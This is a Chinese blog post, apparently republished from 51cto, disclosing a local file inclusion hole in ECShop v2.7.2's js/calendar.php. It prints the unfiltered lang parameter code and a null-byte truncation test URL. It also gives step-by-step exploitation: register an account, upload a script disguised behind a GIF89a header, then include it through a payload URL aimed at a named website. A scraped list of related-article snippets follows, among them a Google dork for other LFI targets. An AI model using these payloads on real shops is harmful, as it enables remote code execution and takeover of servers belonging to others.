很久前就发现了,今天发布出来吧,鸡肋的,其实很简单,就是很多人没有注意这里:

直接看代码:

“js/calendar.php”:

$lang = (!empty($_GET['lang']))
? trim($_GET['lang']) : 'zh_cn';//没有过滤,很明显的包含漏洞

if (!file_exists('../languages/' . $lang . '/calendar.php'))
{
$lang = 'zh_cn';
}

require(dirname(dirname(__FILE__)) . '/data/config.php');
header('Content-type: application/x-javascript; charset=' . EC_CHARSET);

include_once('../languages/' . $lang . '/calendar.php');//这里包含,需要截断

测试代码:

//需要 magic_quotes_gpc = Off

/js/calendar.php?lang=../index.php%00.

(注意后面有个“.”)

利用:

1、注册用户

2、然后上传GIF89a头的GIF文件欺骗,

3、然后包含,如:http://www.lpboke.com/js/calendar.php?lang=../data/feedbackimg/6_20101228vyrpbg.gif%00.

(注意后面有个“.”)‍

Author: ℡Mr.LP

转载于:https://blog.51cto.com/obnus/477160

Ecshop最新版v.272本地包含漏洞Oday相关推荐

  1. 远程本地包含漏洞原理

    inurl:index.php fees shop link.codes http://www.moneyfastonline.com/index.php?read=../../../../../.. ...

  2. 远程包含和本地包含漏洞的原理

    首先,我们来讨论包含文件漏洞,首先要问的是,什么才是"远程文件包含漏洞"?回答是:服务器通过php的特性(函数)去包含任意文件时,由于要包含的这个文件来源过滤不严,从而可去包含一个 ...

  3. cfm本地包含漏洞利用

    1.读取metabase.xml/web.xml /password.properities敏感文件,得知www路径,coldfusion路径,coldfusion后台加密密码. http://www ...

  4. 骑士CMS4.1.23本地包含漏洞

    0x00 在骑士CMS最新版的 index.php页面对$type 调用了display方法 这里的display使用的ThinkPHP的模板展示方法 参数后可直接调用安装目录下的任意文件以PHP形式 ...

  5. php本地文件包含漏洞,本地文件包含漏洞详解---LFI

    1 概述 文件包含(Local File Include)是php脚本的一大特色,程序员们为了开发的方便,常常会用到包含.比如把一系列功能函数都写进fuction.php中,之后当某个文件需要调用的时 ...

  6. php文件包含绕过,文件包含漏洞(绕过姿势) | nmask's Blog

    谁将烟焚散,散了纵横的牵绊 文件包含漏洞是渗透测试过程中用得比较多的一个漏洞,主要用来绕过waf上传木马文件.今日在逛Tools论坛时,发现了一种新型的文件包含姿势,在此记录分享,并附上一些文件包含漏 ...

  7. 文件包含漏洞对公司测试

    主站是:www.xxxx.biz 环境:linux php nginx,伪静态的. 主站基本是没希望,不过xss很多,懒得去利用. 有公司有一个新新业务,所以开发部门建立了一个新的网站,所以我也就.. ...

  8. 【文件包含漏洞】——文件包含漏洞进阶_日志文件包含利用

    文章目录 一.实验目的: 二.工具: 三.实验环境: 四.原理说明: 1. 原理: 2. 利用方法: 五.日志文件相关: 1. 日志文件路径: 2. 没有`access.log`访问日志的原因: 3. ...

  9. 网安学习Day23-文件包含漏洞

    目录 文件包含的原理 文件包含的检测方法 各种脚本对应的文件包含的函数 文件包含的类型 本地文件包含 远程文件包含 文件包含漏洞的利用 读取敏感文件 windows系统 Linux系统 远程包含she ...

最新文章

  1. [原]问题解决办法:there are offline or missing virtual drivers with preserved cache
  2. linux 设置开机启动
  3. 解决重启VCSA 6.0提示:503 Service Unavailable错误
  4. 2. MarkText可代替Typora的markdown 编辑器
  5. APACHE配置文件中文版 httpd.conf FOR Apache 2.2.4
  6. java导出数据EXCEL的工具类(以spring-webmvc-4.0.4jar为基础)
  7. apache中文翻译
  8. CSS选择器之基本选择器总结
  9. ico付费图标下载器 附带易语言源码
  10. 深入浅出量化对冲Alpha基金的操作
  11. [论文学习]TDN: An Integrated Representation Learning Model of Knowledge Graphs
  12. 与浏览网站的访客直接进行QQ对话
  13. (转载)淘宝玉伯引发Web前后端研发模式讨论
  14. vuex入门到实战——实现一个todoList待办清单【学习记录】
  15. python(opencv) SVM 测试使用
  16. @PersistenceContext和@Autowired在EntityManager上应用的不同
  17. ctf入门第一篇——如来十三掌
  18. ssm基于Java web 的人人影视网站管理系统 毕业设计-附源码290915
  19. jzoj6486 向日葵人生 (仙人掌)
  20. Fliqlo时钟Windows、IOS屏保

热门文章

  1. python中的for else语句
  2. 每天定时打开某个网页_纯技术分享,不借助任何工具下载网页中的视频、音乐等~...
  3. 曹讯 计算机摄像学,计算摄像学: 全光视觉信息的计算采集
  4. 将矩阵转为一行_初等变换不会改变矩阵的秩
  5. html5图片img,HTML中图片img标签
  6. D3 scaleOrdinal
  7. 4.4 核对矩阵的维数
  8. Pandas 分割字符串
  9. java多对多的存储_Swift CoreData,通过多对多关系保存数据
  10. 项目安装使用uuid_在uniapp中使用fingerprint2实现游客设备标识